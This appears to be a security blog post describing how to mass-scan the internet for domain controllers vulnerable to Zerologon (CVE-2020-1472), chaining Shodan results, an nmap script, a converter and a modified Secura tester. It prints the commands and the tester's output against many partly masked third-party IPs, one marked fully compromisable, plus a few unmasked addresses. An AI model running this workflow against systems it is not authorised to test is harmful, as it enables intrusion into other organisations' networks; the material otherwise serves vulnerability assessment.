Zerologon (CVE-2020-1472) finding and checking

In August Microsoft released an Advisory for a vuln in Windows RPC (now dupped Zerologon), that gained traktion very soon after a Blog and a working testscript got released by Secura, the company that reported the vuln to Microsoft (see references below)

TL;DR

  • scan 135,137,139,445 or download scan-results from shodan
  • compile a list of potentail ips
  • use a NSE-script smb-os-discovery to scan the result from above and export nmap-results into XML
  • use convert-nmap-zerologon.py to extract HOSTs with domain-info from nmap-xml
  • use the modified testscript to scan the compiled nmap - list from our zeroscan - convert - scripts

poc and exploit

working PoC/Exploit released 24hrs after the first testscript

Since we are not so much into the windows-world, it took us a while to find the right way to scan and identify exposed DCs. We show here our way that might help you to quickly identify and check possible vulnerable systems, but as always: YMMV

Our problem was, that the vuln is in the NETLOGON-procedure, which is not a service by itself, but a procedure, and cannot by be detected out of the box, like a usual service listen on a distinct port.

Step 1: Find all potential targets

Zerologon affects DC, so we need to look for services an DC exposes.

We found no highly-reliable Port or Service to look for, so we started with the usual services and scanned a client-net for ports 135,137,139,445; you can also use your favourite OSINT-searchengine like shodan or zoomeye to get results for larger networks quickly.

With shodan, you will find millions of possible targets, but beware, not all services listening on port 445 must belong to a windows-server.

shodan-res

shodan-result

Compile a list of IPs for the next step.

Step 2: Identifying and scanning DomainControllers

This one got a little tricky, because, like state above, you dont "see" NETLOGON directly; but it is linked to the normal operation of a DC, but NSE to the rescue!

We came up with a NSE-script that will give us soem infos on exposed MS-Computernames and Services, like below: note the difference, the DC is exposed in the second output, whetre you can find entries like Domain Name / Forest name. This still is ist not a 100% proof of a DC, but definetely a computer who is part of a Windows-Domain, while the first scanresult is just a windows-computer in a workgroup, no Domain.

Nmap scan report for 1.2.3.4
Host is up (0.0056s latency).

PORT    STATE    SERVICE
137/tcp filtered netbios-ns
139/tcp filtered netbios-ssn
445/tcp open     microsoft-ds

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: WIN-TO386OSLMOP
|   NetBIOS computer name: WIN-TO386OSLMOP\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-23-42T16:16:35+02:00

------------------------------------------------------------------

Nmap scan report for 4.3.2.1
Host is up (0.12s latency).

PORT    STATE    SERVICE
137/tcp filtered netbios-ns
139/tcp open     netbios-ssn
445/tcp open     microsoft-ds

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: dc
|   NetBIOS computer name: DC\x00
|   Domain name: example.net
|   Forest name: example.net
|   FQDN: dc.example.net
|_  System time: 2020-23-42T07:21:05-07:00

With that said, let this NSE-script run against the ip-list compiled above:

nmap -p 135,137,139,445 --script smb-os-discovery -oA zerologon_nmap -iL ip.list

and grab some coffee; depending on the # of IPs, it will take a while or 2.

Step 3: Converting nmap-results

you can XMLWalk the resultset yourself or use our script to convert the XML into a csv that can be used as input for the zerologon-script by SecuraBV, but beware: XML eating memory like Yabba: parsing a 30MB XML-file resulted in 500MB memory used.

A sample-result from our nmap-extractor-script is shown below:

poc and exploit

extract/convert domaininfos from nmap-NSE

Some numbers from a sampleset of 50.000 random IPs exposing Port:445 with the tag "windows":

  • sampleset: 50.000
  • Hosts with DC-Infos: 1800 (3.5%)
  • Hosts with Workgroup-Info: 12000 (24%)

Step 4: Scanning for the vuln

You can redirect the output from our convert-script:

[ surtr@scann0r :~/zeroscan > ./convert-nmap-zerologon.py scan.xml | grep "yes" | awk -F "|" '{print $1"," $4}' > zero_scanme.csv

For mass-scanning, we changed the original PoC to ingest targets from a file and output to a logfile, instead of scanning a single target only.

[ surtr@scann0r :~/zeroscan] > ./zerologon_tester-mod.py zero_scanme.csv


[i] 12.197.x.y already checked, skipping
[i] 129.232.x.y already checked, skipping
[i] 190.131.210.66 already checked, skipping
Performing authentication attempts...
[-]     44.232.x.y | Attack failed. Target is probably patched.
Performing authentication attempts...
[-]    66.186.x.y | Attack failed. Target is probably patched.
Performing authentication attempts...
[-]   218.223.x.y | Attack failed. Target is probably patched.
Performing authentication attempts...
[-]   185.33.x.y | Attack failed. Target is probably patched.
Performing authentication attempts...
[-]   66.165.x.y | Attack failed. Target is probably patched.
Performing authentication attempts...
[-]    176.28.x.y | Attack failed. Target is probably patched.
Performing authentication attempts...
[-]   212.37.105.134 | Attack failed. Target is probably patched.
Performing authentication attempts...
===============...=====================================
[+]     52.52.x.y | Success! DC can be fully compromised by a Zerologon attack.
Performing authentication attempts...
[-]    85.209.x.y | Attack failed. Target is probably patched.
...

The modified version will create a logfile (in this case: zero_scanme.csv.log), so you can stop and resume your scan at any time.

References





Fragen? Kontakt: info@zero.bs

taggy